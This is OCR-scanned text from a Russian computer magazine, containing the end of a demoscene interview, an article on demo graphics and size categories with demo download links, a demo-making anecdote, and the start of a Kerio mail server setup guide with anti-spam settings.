А: Да, команда. Знаком я с ними не так тесно — 
не знаю деталей. Впрочем, знаю, что Кроликсы из 
Самары, a Fox (это не группа, а человек) — из Kpac- 
ноярска. Кроме демомейкинга многие связаны 
с разработкой игр, поскольку это смежное занятие. 
О: Линкс из Кроликса, по-моему, из братской 
Белоруссии. Довелось с ним пообщаться — 
веселый парень. 

А: Ну вот, тем более — ты лучше меня знаешь :). 
Так или иначе, Кроликсы устойчиво держат перве- 
нство на отечественной демосцене. 

О: О'кей, не будем о людях, будем о кодинге. 

Мы — практически-ориентированный журнал, 

и нашим читателям будет крайне интересно 
знать, чему надо учиться, чтобы стать крутым 
демо-кодером: какие книжки читать, на какие 
сайты ходить и с кем дружить. 

А: Крутыми обычно становятся те, кто об этом не 
думает. Потому что все мысли о кодинге, а о кру- 
тости думать не успевают. 

Лучше всего, я думаю, учиться на примерах. 
Смотреть, как что-то сделано, разбираться, ко- 
паться в исходниках или коде. Читать разнообраз- 
ную документацию, например, no DirectX. Сейчас 
регулярно появляются статьи самих демомейке- 
ров. На мой взгляд, самая большая опасность — 
копирование чужих идей. 

О: Есть какая-то книга или ресурс, который 
произвел на тебя большое впечатление? 

А: Самые интересные статьи и куски кода я встре- 
чал на сайтах, где кроме них больше ничего не бы- 
ло :). Моя рекомендация — Google и вперед. 

Есть сайты, которые в любом случае стоит 
посещать: http://www.ojuice.net/ , http://www.pouet.net , 
http://www.scene.org, http://www.demoscene.ru , http://no- 
scene.org.ru. A дальше уже по ссылкам оттуда. 

О: Напоследок — личный вопрос. Как твое 
семейство относится к кодингу и демомейкингу? 
Подруга/жена не ревнует тебя к этому делу? 

А: Прежняя подруга несколько напрягалась на 
компьютеры вообще. Без деления на демосцену и 
все остальное. Собственно, понятно почему. 
В данный же момент тараканы не имеют ничего 
против демосцены. 

О: Вот это мужской ответ. Спасибо за интервью, 
было приятно пообщаться. 

А: Спасибо! © 


японские 
PENAL 
вонь 
AEH 


САМЫЕ ИЗОЩРЕННЫЕ 
ИГРОВЫЕ АВТОМАТЫ 


ИСТИННОЕ ЛИЦО 
РАБОТНИКОВ СУШИ-БАРОВ 


ДОРОЖНЫЕ ЗНАКИ ТРЕТЬЕГО МИРА 


“ АН japanese 
trends inside 


Уже в продаже 


88 СПЕЦ-ТОР!С СПЕЦ 02-07 


графика 
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На самом деле, в деталях рассказывать историю воз- 
никновения демосцены в этой статье я не буду, пос- 
кольку в интернете и так слишком много материала 
на эту тему. Особо интересующимся людям, владе- 
ющим английским языком и отягощенным лишними 
35 евро, я могу посоветовать заказать себе книжку 
по истории демосцены и альбом рисованной демос- 
ценерской графики Freax (http://freax.hu). Отмечу 
лишь, что тенденция развития здесь стандартна для 
всего компьютерного искусства — от простого 
ксложному. Все логично: растут возможности компь- 
ютерного железа — развивается креативная мысль 
демосценера. Что было в начале? А в начале были 
cracktro под C64. Представляли они собой маленькие 
программульки в виде одной пиксельной (а какой же 
еще?) картинки, одной (или нескольких) мелодий и 
кучи текста в виде всевозможных «бегущих строк». 
Собственно, все творчество сгасКк-сцены начиналось 
с того, чтобы как можно необычней и эффектней 
представить уважаемой публике свою ломалку для 
софта. Со временем творческая часть отмежева- 
лась, переопределилась, и сформировалось некое 
подобие демосцены. Народ стал увлеченно соперни- 
чать друг с другом в мастерстве выжимания соков из 
фиксированных конфигураций компов, в использо- 
вании новых концептов в дизайне и тому подобных 
номинациях. Художественная и музыкальная сцены 
особо не выделялись и были частью одной ДемоСце- 
ны. Люди сбивались в команды и боролись за право 
называться самыми популярными и самыми лучши- 
ми. Было весело. Смотришь демку — атам пьянень- 
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кий носатый мужичок бегущей строкой самыми пос- 
ледними словами кроет некую команду Х. А через 
недельку возьмешь у кого-нибудь дискетку со свежи- 
ми демами, а там уже, соответственно, коман- 
да Х кроет бегущей строкой авторов того мужичка. 
Занимательный креатив! В общем, графика в де- 
мах — вещь необходимая, но не определяющая де- 
му как таковую. Должна быть идея и творческая нап- 
равленность... 

> с чего начинается ДЕМО. Во-первых, под де- 
мой в любом случае подразумевают анимацию (сог- 
ласись, обычную картинку никто демой не назовет). 
А вотесли эту картинку в режиме реального време- 
ни морфить, блурить и всячески колбасить, то это 
уже демо... Конечно, по сегодняшним меркам очень 
простое, но все же демо. А если уж все действие 
происходит под музыку — респект! На exUSSR де- 
мопати войдет в первую 10-ку. Это — так называе- 
мые 20-эффекты. С них все начиналось, они — но- 
сители атмосферы демок 90-х, и именно по ним я 
порой скучаю в процессе просмотра современных 
творений, хотя сейчас они производят гораздо 


меньше эффекта, ведь у всех есть инет, в котором 
лежит куча рисованных картинок, а у многих имеют- 
ся вналичии и графические планшетки... Пиксель- 
ная графика не актуальна. Наличие на экране кра- 
сивой рисованной мышкой картинки не вызывает 
того восторга, какой был вте времена, когда подоб- 
ные картинки коллекционировали и знали всех 
компьютерных художников по никам. Не скажу, что 
это плохо, ведь это прогресс, но все-таки грустно... 
С появлением акселераторов и пиксельных 
шейдеров демы стали больше напоминать техноло- 
гические тесты, а не душевную народную живопись. 
Повторюсь, демосцена — это народное творчество. 
Понимаешь? Здесь нет правил, регламентов, зако- 
нов или табу (кроме политики), есть только тради- 
ции. Одной из традиций, кстати, является стремле- 
ние поломать все традиции и сделать что-нибудь из 
ряда вон выходящее. Это одна из причин, почему 
демосцена затягивает и долго не отпускает, застав- 
ляя ностальгировать по «былым временам». 
Слишком абстрактно? Ладно, пример. Смот- 
рим демы, типичные для своего времени: Future 


Confused by Procreation, Spleen by Marshals, Chrome 
by Damage. 

Красивое сочетание рисованной 20-графики, 
рендеринга простеньких ЗО-моделей, сцен проле- 
та над местностью (Ну Бу), притянутая за уши об- 
щая тема или полное отсутствие таковой. Но в це- 
лом — красиво, приятно, и хочется посмотреть еще 
раз. А теперь смотрим это: 

1 Glitch by Kewlers (ftp://ftp.scene.org/pub/parties/2003/ 
stream03/demo/kwl_itch.zip); 

2 X-Mix 2004 by МЕХ Kewlers (http://www.pouet.net/ 
prod.php?which=12028); 

3 Typo Graphics by Kewlers (ftp://ftp.scene.org/pub/ 
parties/2004/scene_event04/demo/typo_graphics_by_kewlers.zip). 

Контрастно, He правда ли? Динамика, инно- 
вация, смелость решения! Ну как после этого мож- 
но говорить о графике и дизайне на демосцене 
обобщенно?! Сколько команд, столько и возмож- 
ных подходов. Существуют, конечно, какие-то наи- 
более часто используемые приемы и эффекты, но 
их комбинации в умелых руках рождает неповтори- 
мые шедевры. 
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Тем не менее, постараюсь хоть как-то струк- 
турировать варианты графики в демах (я имею в 
виду только РС). Не уверен, что получится, но поп- 
робовать стоит. Итак... 


— 256 БАЙТ. ОЦЕНИВАЕТСЯ ТОЛЬКО 
УМЕНИЕ КОДЕРА ВПИХНУТЬ В ТАКОЙ 
РАЗМЕР ЧТО-ЛИБО. ВОЗМОЖНЫ 
ДВА ВАРИАНТА: 


1 МНОГО МАЛЕНЬКИХ, ПРОСТЕНЬКИХ 
И ОДНОТИПНЫХ ЭФФЕКТОВ; 


2 ОДИН, НО СЛОЖНЫЙ. МОЖЕТ БЫТЬ 
ПСЕВДО-30. 


— 512 БАЙТ ДЕМО. ОЦЕНИВАЕТСЯ 
ТО ЖЕ САМОЕ. ВАРИАНТЫ, В ПРИНЦИПЕ, 
ТЕ ЖЕ, НО В ТАКОЕ ПРОСТРАНСТВО 
ДОБАВЛЯЕТСЯ ВОЗМОЖНОСТЬ 
ВПИХНУТЬ 30-СЦЕНКУ. А 30-ДВИЖОК 
С 7-БУФФЕРОМ В 512 БАЙТ — ЭТО, 
ЗНАЕТЕ ЛИ, ВПЕЧАТЛЯЕТ САМО ПО СЕБЕ, 
НЕВЗИРАЯ НА ОТВРАТНУЮ КАРТИНКУ. 


— 4 КБ ДЕМО. ТУТ ПОСВОБОДНЕЕ. 
30-ДВИЖОК, ИНТЕРЕСНЫЕ ТЕКСТУРЫ, 
МУЗЫКА, ПОЯВЛЯЕТСЯ МЕСТО ДЛЯ 
ДИЗАЙНЕРА, НО КОДЕР ПО-ПРЕЖНЕМУ 
ОСТАЕТСЯ ЦЕНТРАЛЬНОЙ ФИГУРОЙ. 
ОСНОВЫВАЮТСЯ ТАКИЕ ДЕМЫ НА 
РЕАЛИЗОВАНЫХ В ДВИЖКЕ ЭФФЕКТАХ. 
ПРАВДА, В 4 КБ ОСОБО НЕ РАЗГУЛЯЕШЬСЯ, 
И ЧАСТО ЭТИ ДЕМЫ ПРЕДСТАВЛЯЮТ 
СОБОЙ 2-3 СЦЕНКИ НА ОРЕМСЕ-ДВИЖКЕ 
С ПРОСТЫМИ ТЕКСТУРАМИ И ОБЪЕКТАМИ 
ИЗ ПРИМИТИВОВ (ШАРИКИ, КУБИКИ, 
БУБЛИКИ). НО ТЕХНИЧЕСКАЯ МЫСЛЬ 
НЕ СТОИТ НА МЕСТЕ, И СЕЙЧАС МОЖНО 
УВИДЕТЬ МОЩНЫЕ ВЕЩИ ТИПА SQUISH4K. 


— 64 КБ ДЕМО. BOOOOO! ДЛЯ МНОГИХ 
УВЛЕЧЕННЫХ ДЕМОСЦЕНОЙ ЛЮДЕЙ ЭТО 
ЧИСЛО ЯВЛЯЕТСЯ САМЫМ ИНТЕРЕСНЫМ. 
ПОЧЕМУ? ДА ПОТОМУ ЧТО Я ДАЖЕ НЕ 
ПРЕДСТАВЛЯЮ, КАК МОЖНО ВПИХНУТЬ 
В 64 КИЛОБАЙТА КВАРТЕТ ИЗ ЧЕТЫРЕХ 
ОБЕЗЬЯНОК, ИГРАЮЩИХ НА РАЗНЫХ 
РЕАЛИСТИЧНО ЗВУЧАЩИХ МУЗЫКАЛЬНЫХ 
ИНСТРУМЕНТАХ, НА ФОНЕ ДИНАМИЧНО 
ИЗМЕНЯЮЩЕГОСЯ ПЕЙЗАЖА СО СКАЛАМИ 
И ДЖУНГЛЯМИ! ПОЛЕТ ФАНТАЗИИ 
ДИЗАЙНЕРА СИМВОЛИЧЕСКИ 
ОГРАНИЧЕН — НЕЛЬЗЯ ИСПОЛЬЗОВАТЬ 
РИСОВАННУЮ 20-ГРАФИКУ (РАСТРОВЫЕ 
КАРТИНКИ ЗАНИМАЮТ МНОГО МЕСТА). 
ДИЗАЙН И ГРАФИКА... ДА, ИХ НЕЛЬЗЯ 
ЗАГНАТЬ В РАМКИ! ПОЭТОМУ ДЕМЫ 
ДАЖЕ НА ОДНОМ ДЕМОТУЛЗЕ 
(ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ, 
СОЗДАННОЕ ДЕМОСЦЕНЕРАМИ ДЛЯ 
ДЕМОСЦЕНЕРОВ, С ПОМОЩЬЮ 
КОТОРОГО МОЖНО СОЗДАТЬ ДЕМО, 
ВПИСЫВАЮЩЕЕСЯ В 64 КБ) 


ПОЛУЧАЮТСЯ АБСОЛЮТНО 
НЕПОХОЖИМИ ДРУГ НА ДРУГА! 
ТАКОГО ПОЛЕТА ФАНТАЗИИ СЕЙЧАС 
НЕ ВСТРЕТИШЬ ДАЖЕ В МЕГАДЕМО... 


Посмотри на это разнообразие: 

17тот Dusk til Dawn by Fairlight (ftp://ftp.scene.org/ 
pub/parties/2004/remedy04/demo/fairlight__from_dust_ 
till_dawn.zip); 

2Zoom3 by AND Cybermag (http://www.pouet.net/ 
prod.php?which=10454); 

3 Candytron (FR30) by Farbrausch (http://www.pou- 
et.net/prod.php?which=9424); 

4 Welcome to by Farbrausch (http://www.pou- 
et.net/prod.php?which=8696); 

5 Binary Flow by Conspiracy (http://www.conspira- 
cy.hu/dl.php3?prod=13); 

6 Beyond by Conspiracy (http://conspiracy.intro.hu/ 
releases/cns! bydf.zip). 

Мегадемо — вершина айсберга. Здесь проде- 
монстрировать способности могут и старожилы де- 
мосцены, и новички. Это очень удобный формат для 
начинающих демосценеров, так как не надо замора- 
чиваться с оптимизацией по размеру, нет необходи- 
мости мучить ни кодера, ни моделлера, ни музыкан- 
та. Все делают, что хотят и умеют делать. Представь 
ситуацию: ты впервые в жизни решил сделать ДЕ- 
МУ. Ты умеешь, допустим, кодить. А твой друг, нап- 
ример, умеет рисовать мышкой кракозябры в фото- 
шопе. А некий знакомый пишет музыку в трекерах и 
с предоставит вам пару композиций на выбор. Пе- 
ред командой встает нелегкий выбор: 


1 НАПИСАТЬ ДВИЖОК НА ЧИСТОМ 
АССЕМБЛЕРЕ, НАПИСАТЬ ГЕНЕРАТОР 
TEKCTYP, НАПИСАТЬ ИНСТРУМЕНТ ДЛЯ 
МОДЕЛЛЕРА ( СВОЙ МИНИ-ЗОМАКС), 
СДЕЛАТЬ ЗВУКОВОЙ СИНТЕЗАТОР 
(КИЛОБАЙТ НА 20 МАКСИМУМ), 
ЗАСТАВИТЬ МУЗЫКАНТА ПЕРЕПИСАТЬ 
КОМПОЗИЦИЮ ПОД НАШ СИНТЕЗАТОР 
(ВСЕ ПЕРЕЧИСЛЕННОЕ — РУЧКАМИ), 
УПРОСИТЬ ХУДОЖНИКА ЗАБИТЬ 

НА ЖЕЛАНИЕ НАРИСОВАТЬ ЧТО-ЛИБО, 
ИЗУЧИТЬ ВМЕСТО ЭТОГО АБСОЛЮТНО 
НЕЦЕНЗУРНЫЙ 309-МОДЕЛИРУЮЩИЙ 
СОФТ И ЗАДИЗАЙНИТЬ МИНИ-ДЕМО 

В ЖУТКО ОГРАНИЧЕННЫХ УСЛОВИЯХ 
ДЛЯ 64 КБ КОНКУРСА. 


2 ПРОСТО ДЕЛАТЬ ТО, ЧТО НРАВИТСЯ, 
НЕ ОГРАНИЧИВАЯ СЕБЯ В РЕСУРСАХ. 
СОБРАТЬСЯ ВСЕМ ВМЕСТЕ И СШИТЬ 
ОБЩИЕ НАРАБОТКИ В ОДНУ МЕГАДЕМУ. 


В результате получается, что в этом классе 
проекты абсолютно неприглядные соседствуют 
с невообразимыми шедеврами! Перечислять луч- 
шие мегадемо очень сложно, так как каждый най- 
дет свою изюминку и направление в общей массе. 

Могу лишь отметить из ряда вон выходящие 
мегадемо групп Kewlers и МЕХ. Их творчество не- 


FROM DUSK TIL DAWN 
by Fairlight 

ZOOM3 

by AND Cybermag 
CANDYTRON (FR30) 
by Farbrausch 

BINARY FLOW 

by Conspiracy 
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возможно спутать ни с чем (несмотря на наличие 
кучи подражателей). 

Сочетание абстракционизма, экспрессиониз- 
ма, сюрреализма и еще чего-то неуловимого делают 
их работы запоминающимися и уникальными. В чем 
секрет? Не знаю... Но выглядит просто потрясающе. 

1 Aether by МЕХ (ftp://ftp.scene.org/pub/parties/2005/ 
breakpoint05/demo/mfx_athr.zip) 

2Pornonoise by MFX 
prod.php?which=9467) 

3 Deepness in the Sky by МЕХ (ftp://ftp.scene.org/ 
pub/parties/2002/sota02/demo/mfx_dis.zip) 

4 Variform by Kewlers (ftp://ftp.scene.org/pub/par- 
ties/2002/assembly02/demo/variform_by_kewlers.zip) 

5 Protozoa by Kewlers (ftp://ftp.scene.org/pub/par- 
ties/2003/breakpoint03/demo/kwl_prtz.zip) 

6 A Significant Deformation Near The Cranium by 
Kewlers (ftp://ftp.scene.org/pub/parties/2003/assembly03/demo/ 
a_significant_deformation_near_the_cranium_by_kewlers.zip) 

7 X-Mix 2004 by МЕХ Kewlers (http:/Avww.pouet.net/ 
prod.php?which=12028) 

Как они это делают?! Может быть, просто сов- 
местить 2D и 3D? Берем идею, рисуем под нее 3D- 
модельки и 20-фоны, комбинируем движком в стиль- 
ную плавно переливающуюся симфонию свободной 
мысли и... Получаем что-то типа дем Houjobb'os: 

1 MicroStrange by Haujobb; 

2 Elements by Haujobb; 


(http://www.pouet.net/- 


ud Sie 


3 We are by Haujobb (http://www.pouet.net/prod. 
php?which=8281); 

4 Strange Feelings by Haujobb. 

Это я написал не к тому, что Хауджоббы луч- 
ше всех, а ктому, что их команда стабильно созда- 
вала уникальные атмосферные произведения из го- 
да в год. В чем их секрет, я тоже не знаю, но факт 
остается фактом — ребята работали не щадя свое- 
го времени и сил, добивались именно того резуль- 
тата, который был задуман дизайнером. А все поче- 
му? Потому что талантливый народ был? Да! Но 
ведь и сейчас встречаются таланты? Так в чем же 
дело? А дело в правильном распределении задач 
между членами команды и в наличии этих самых 
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членов в достаточном количестве. Посмотрим на ко- 
личество мемберов у тех же Haujobb (>40), tAAt(>20), 
ByteRapers(>30), ТВЦ >30), Razor 1911 (вообще не- 
меренно). Пара 20-художников, 2-3 3D-mogennepa, 
кодер на 2)9-эффекты, пара кодеров на 3D, музы- 
канты на выбор... Нет проблем! Не нужно разры- 
ваться! Каждый занимается тем, что ему по душе. 
Поэтому и демы получаются душевные. 

А на современные команды гляньте! Апо- 
гей — AND. Сам себе команда :). 

Воти получаютсяу них поделки либо с мощным 
движком и ограниченным дизайном, либо с интерес- 
ным дизайном/идеями, но невразумительным испол- 
нением кода. Отсюда и выкрики «Scene is dead». 


DEEPNESS IN THE SKY 
by MFX 
AETHER 

by MFX 
PORNONOISE 
by MFX 
ELEMENTS 
by HaujobbX 
ELEMENTS 
by HaujobbX 
ELEMENTS 
by HaujobbX 


И вообще, под демой подразумевают креатив. 
Инновационные подходы к дизайну цвета и формы, 
необычные методы визуализации, шокирущий ви- 
деоряд, увлекательный сюжет... Я понимаю, что 
сложно придерживаться этих линий, но крайне же- 
лательно о них вспоминать хоть иногда. 

Также не стоит забывать, что чаще всего 
демка является продуктом коллективного творче- 
ства. А это значит, что финальный релиз часто по- 
лучается неожиданным для большинства членов 
команды. Почему? Да очень просто! Кодер пишет 
те эффекты, которые ему хочется опробовать, ху- 
дожник рисует то, что у него лучше всего получает- 
ся, а музыкант вообще не заморачивается и прос- 
то вываливает на стол кучу трэков из погреба. Роль 
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дизайнера в таком случае исполняет коллективный 
разум (он же — «генератор бреда»). 

Дема должна быть еще и флагманом IT-npor- 
ресса... Девиз «Выдавить максимум красоты из же- 
леза» является основополагающим на просторах 
демосцены. Юзеры-зрители по всему миру получа- 
ют возможность убедиться в мощном потенциале и 
полезности своих компов для мирового искусства, 
проникаются чувствами, идеями, стремлениями... 

Обратная сторона медали погони за «техно- 
логичностью» демки — слабеющая с каждым годом 
креативная составляющая. Тема, идея, сюжет — 
кому это интересно, если можно рендирить в риал- 
тайме бублики на 500 тысяч полигонов каждый, с 
бампами, преломлениями, реальными отражения- 
ми, натуральной физикой столкновений, да еще и 
на фоне трех миллионов травинок с бликами и фла- 
риками? Все итак будут в восторге... Особенно об- 
ладатели видюх за $600, на которых все это «твор- 
чество» будет выдавать 11fps. Прогресс. 
> заключение. Я думаю, что в результате все 
будет хорошо. Вот наиграются кодеры новыми GPU, 
напишут удобные и понятные тулзы, и явятся из Te- 
ни на свет молодые и талантливые художники-ди- 
зайнеры. И будет править новый девиз — «Макси- 
мум креатива, новизны, чувственности!». Ну а коде- 
ры будут только поддакивать, расширять возмож- 
ности тулзов и гонять за пивом... © 


ИЗ ИСТОРИИ 
СОЗДАНИЯ ДЕМЫ 
UNDERSPACE 
(CROLYX TEAM) 


Звонит Xiod (кодер, музыкант). 
«Приходите делать дему... Ато дедлайн на Мил- 
ленниум Демопати послезавтра — не успеем». 

Не хочется, но надо... Ладно... Приходим 
с Сгоск'Ом (мощный кодер). Настроение никакое. 
Идей — ноль. Ксиод начинает показывать дви- 
OK... Кроку интересно — он программер. На мони- 
торе — софтварный рендер в 512х384. Жуть. И это 
в 2001 году! Успокаивает то, что на пати наверняка 
будет плохо настроенный проектор не лучшего ка- 
чества, который будет работать за хардварный ан- 
тиальязинг. Ладно... Музыка. Хорошая, конечно, 
но настраивает на суицид: я его дисторшн не пере- 
вариваю. На выбор представлено несколько трэ- 
ков, но от этого не легче. 

Ладно... Сцены. Вот тут включается «коллек- 
тивный разум»! Ксиод показывает, что уже накодил. 

На экране кубик, все грани представляют со- 
бой вентиляторы (по идее), и «это» летит по небу. 


{Ксиод} Вот! 

{Линкс} Бред. 

{Крок} Ммм... Фигня какая-то... А если лететь внут- 
ри кубика и смотреть через вращающиеся лопасти 
вниз? 

{Ксиод} Да! Будет клево! 

{Линкс} Бред. 

{Ксиод} #% @ &**! 

{Линкс} Ну и ладно... (рассматриваю журнал с кар- 
тинками). 

{Ксиод} Сделай лучше! 

{Крок} Ну, можно сделать ВолумЛайт через враща- 
ющиеся лопасти... 

{Линкс} Дурка. 

{Ксиод} % @ #%*!! 

{Линкс} (глядя в журнал с картинками): Стоун- 
хэндж лучше вашего кубика. 

{Ксиод} Сделай, $% @ @ %»&#!! 

{Линкс} Лана... 


Сделал... Летающий остров со Стоунхэнджем. 

К чему эта сцена, никто не знает, но она лучше ку- 
бика, и поэтому «коллективный разум» ее одоб- 
рил. Именно таким образом и создается многозна- 
чительность и псевдофилософия в деме ;). 


ОФФТОПИК 
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ДА ЗДРАВСТВУЕТ МЫЛО ДУШИСТОЕ! 
НАСТРОЙКА ПОЧТОВОГО СЕРВЕРА 


АЛЕКСАНДР ПРИХОДЬКО 


(SANPRIH@MAIL.RU) 


В настоящее время без электронной 
почты не живет, пожалуй, ни одна 
организация. Мы с тобой подняли 

и настроили домен, подключили 
пользователей к Сети, и для счастья 
нам не хватает того самого душисто- 
го мыла. Перед установкой и наст- 
ройкой почтового сервера нам необ- 
ходимо обзавестись двумя вещами: 
реальным IP-agpecom и доменным 
именем. Реальный адрес у тебя есть, 
а вот с именем можно поступить дву- 
мя способами: либо купить у провай- 
дера/хостера, либо безвозмездно, то 
есть даром, взять у ближайшего про- 
вайдера доменное имя третьего 
уровня. Предположим, что мы заре- 
гистрировали свое доменное имя 
xakdomain.org, адрес у нас есть. Про- 
вайдер пропишет у себя в DNS-30He 
запись МХ, где укажет наше имя и 
адрес. В принципе, ты можешь под- 
нять свой ОМ$-сервер и наполнить 
его необходимыми записями, затем 
настроить трансфер зоны на провай- 
дера и сам отвечать за доступность 
сервера. Теперь подумаем, где, 
собственно, мы поместим наш почто- 
вый сервер. Можно вынести его за 
пределы твоей сети прямо в интер- 
нет, установить на почтовике файр- 
вол, антивирус и наблюдать за ним 
особо тщательно. Но тогда все твои 
обращения к нему — драгоценный 
трафик. Можно установить его во 
внутренней сети: тогда скорость ра- 
боты корпоративной почты будет 
очень высока, и никакого лишнего 
трафика! На сервере ставишь две 
сетевые карты, одна смотрит в твою 
сеть, вторая — в мир. Ставишь 
файрвол, и все готово. 

Лирическое отступление за- 
кончим выбором продукта. Не в це- 
лях рекламы, а ради познания исти- 
ны мы рассмотрим почтовый сервер 


фирмы Kerio. По стоимости продукт 
доступен даже для небольшой кон- 
торы. Например, почтовик на 30 
персон обойдется примерно в 700 
убитых енотов. Попробовать почто- 
вик можно, скачав с сервера триаль- 
ную версию программы — 
www.kerio.com. Начинаем установку. 
Разработчики позаботились о носи- 
телях русского языка, что не может 
не радовать. Жмем «ОК» и любуем- 
ся матросом с флагом (что имел 

в виду дизайнер инсталляшки — ос- 
тается загадкой). «Далее». Читаем, 
как много умеет версия 6.3 почтово- 
го сервера. «Далее». Принимаем ли- 
цензионное соглашение. «Далее». 
Приходим к виду установки. 

Отмечаем «Выборочную уста- 
новку», выбираем каталог для уста- 
новки программы. Наконец добра- 
лись до самого выбора. Отключаем 
справку на чешском языке. «Да- 
лее». И, наконец, жмем «Устано- 
вить». Пока прога устанавливается, 
набросай себе список пользовате- 
лей и придумай пароли для подклю- 
чения к почтовику. На определенном 
этапе установки визард предложит 
ввести доменное имя. Оставляем 
все по умолчанию и идем далее. 

Заводим админскую учетную 
запись и придумываем длинный 
пароль. 

Теперь следует выбрать ката- 
лог и диск, куда почтовик будет 
складывать всю почту. Прикинь, 
на какой электронный документо- 
оборот способна твоя контора. Ес- 
ли работники постоянно отсылают 
и принимают файлы и количество 
клиентов достаточно большое, 
то для хранилища имеет смысл за- 
вести отдельный диск, если оборот 
писем маленький — оставляем 
все по умолчанию. 
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И, наконец, нажимаем послед- 
ний раз кнопку «Готово». Перезагру- 
жаем сервер и в трее видим кусочек 
красно-белого флага, которым раз- 
махивал матрос при установке, — 
это и есть наша почта. Запустим ее. 
Так как у нас сервер прикрыт файр- 
волом фирмы Kerio, то выскакивает 
панель администрирования, в ней 
выбираем «мейл — сервер». При 
первом запуске нам предлагается 
зарегистрировать продукт. Закрыва- 
ем окно. Вот оно — наше мыло. 

Теперь начнем настраивать на- 
ше новое хозяйство. Заходим на зак- 
ладку «Службы» и останавливаем 
ненужные службы. Вопрос о необхо- 
димости работы этих служб ты, кон- 
чено, решаешь сам, HO для работы 
стандартного почтового сервера их 
можно и остановить. Для начала отк- 
лючаем протокол IMAP. Вот тебе вы- 
держка из википедии: «IMAP (Internet 
Message Access Protocol) — интер- 
нет-протокол прикладного уровня 
для доступа к электронной почте.» 

«IMAP предоставляет пользо- 
вателю богатые возможности для 


Настройка ретрансляции 


работы с почтовыми ящиками, нахо- 
дящимися на центральном сервере. 
Почтовая программа, использующая 
этот протокол, получает доступ 

к хранилищу корреспонденции на 
сервере так, как будто эта коррес- 
понденция расположена на компью- 
тере получателя. Электронными 
письмами можно манипулировать 

с компьютера пользователя (клиен- 
та) без необходимости постоянной 
пересылки с сервера и обратно фай- 
лов с полным содержанием писем». 
Естественно, заодно пристреливаем 
И «Защищенный IMAP». Продолжа- 
ем использовать википедию: 

«NNTP — основной и един- 
ственный протокол, по которому 
пользователи могут подключаться 
к пем/з-серверам и участвовать 
в дискуссиях. По строению этот про- 
токол сходен с протоколами приема 
и передачи электронной почты. 
News-cepBep представляет собой 
постоянно подключенный к сети 
компьютер, на котором хранятся со- 


общения дискуссии. Основное отли- 
чие технологии ММТР от е-тай — от- 
сылаемые сообщения общедоступ- 
ны. Сообщения сгруппированы 

по темам обсуждения. 

Возможно отозвать посланное 
сообщение. Фактически, решения 
технологии ММТР очень похожи 
на веб-форумы за исключением то- 
го, что копия базы данных сообще- 
ний хранится на компьютере пользо- 
вателя (или хотя бы список тем со- 
общений). За ММТР закреплен ТСР- 
порт 119. При подключении к ММТР- 
серверу no SSL (т.н. ММТР$) исполь- 
зуется порт 563». 

Нам для получения информа- 
ции хватает и обычного интернета. 
Отключаем ММТР и «Защищенный 
ММТР». Разбираемся еще с одним 
протоколом. Это LDAP. Если ты 
не собираешься импортировать 
пользователей из Active Directory, 
то протокол можно отключить. 

Вот что у нас осталось: 

Для настройки некоторых па- 
раметров нам необходимо создать 
группу IP-agpecos нашей сети. Захо- 
дим на закладку «Определения»-» 
«Группы 1Р-адресов»-» «Добавить», 
дадим имя нашей группе «Lan», 
«Тип» — выбираем значение «Диа- 
пазон адресов», и в поля «От» 

и «До» вводим начальное и конеч- 
ное значения адресов нашей сети. 

Запомни процесс создания 
групп Р-адресов, — он нам еще при- 
годится. Теперь настроим параметры 
нашего «Сервера SMTP». Заходим 
в закладку «Конфигурация»-+ «Сер- 
вер SMTP». На первой же закладке 
«Управление ретрансляцией» отме- 
чаем галочкой «Пользователи 
из группы 1Р-адресов» и выбираем 
созданную нами группу 1Р-адресов 
«LAN». Таким образом, мы разреша- 
ем своим пользователям пересылать 
чужие письма, но не позволяем ис- 
пользовать наш почтовый сервер 
для рассылки спама. 

Переходим в закладку «Пара- 
метры безопасности». Отмечаем га- 
лочкой «Макс. число неизвестных по- 
лучателей...», «Не применять эти ог- 
раничения для группы 1Р-адресов» — 
выбираем «LAN». Не забываем пос- 
ле каждого изменения нажимать 
кнопку «Применить». Ну и ограничим 
размер исходящих сообщений, нап- 
ример, пятью мегабайтами. 

В закладке «Доставка SMTP» 
ничего не меняем и переходим 
в закладку «Параметры очереди». 
Здесь все тоже оставляем по умол- 
чанию, разве что можно сменить 
язык отчетов на «Русский». Перехо- 
дим к фильтру содержимого. Зак- 
ладка «Фильтр содержимого»-+ 
«Фильтр спама». В первой закладке 
«Оценка принадлежности сообще- 
ний к спаму» не трогаем ничего. Пе- 
реходим в закладку «Черные спис- 
ки». Вот теперь нам необходимо 
вернуться в закладку «Определе- 


НИЯ»-+ «Группы 1Р-адресов»-» «До- 
бавить» и включить сюда еще одну 
группу, которую назовем 
«Spam&Virus». 

В эту группу ты сможешь зано- 
сить особо надоедливые адреса 
по рассылке спама и вирей. В свой- 
ствах выбираешь «Тип»-> «Хост», 
записываешь адрес первого попав- 
шегося спамера (например 61.216.- 
119.248), в описании пишешь 
«SPAM». Возвращаемся в закладку 
«Фильтр содержимого» -+ «Черные 
списки». Отмечаешь галочкой пере- 
численные в таблице «Черные спис- 
ки сети Интернет» ресурсы 
и в «Пользовательском черном 
списке 1Р-адресов распространите- 
лей спама» в «Группе IP-agpecos» 
выбираешь созданную тобой группу 
1Р-адресов «Spam&Virus». Не забы- 
вай давить «Применить». 

Теперь ты готов воевать 
со спамерами самостоятельно. 

Из любого входящего спамерского 
письма ты вытаскиваешь |Р-адрес 
машины, пославшей это письмо, 

и заносишь его в свою группу 
«Span&Virus». И все, почтовик сбра- 
сывает эти письма и тебя не трога- 
ет. Если твоя контора не общается 
с адресатами из-за границы, то 
можно отрезать целые страны. Нап- 
ример, адрес, который мы первым 
занесли в список, принадлежит Тай- 
ваню. Методика поиска такова: за- 
писал адрес спам-машины, залез 

в интернет на поисковик, например 
www.whoisinform.ru, выбрал из списка 
«Поиск информации об 1Р-адресе», 
ввел в поле адрес и нажал «Найти». 
В ответ получил инфу о том, какой 
сети принадлежит данная машина, 
и инфу о размере сети. В нашем 
случае это адреса в диапазоне 
61.216.0.0 — 61.219.255.255. Никто 
тебе не мешает отрезать всю эту 
сеть. В списке 1Р-адресов создаешь 
запись типа «Диапазон адресов» — 
и прощай переписка с Тайванем. Те- 
перь переходим сразу на закладку 
«Средство защиты от спама». Отме- 
чаем галочкой «Задержать привет- 
ствие SMTP на 25 сек.», выбираем 
в поле «Не применять задержку 
для соединений от LAN. 

Данное действие позволит от- 
бить некоторое количество спама. 
Принцип действия такой: в момент 
установки соединения и обмена ин- 
формацией между ЗМТР-серверами, 
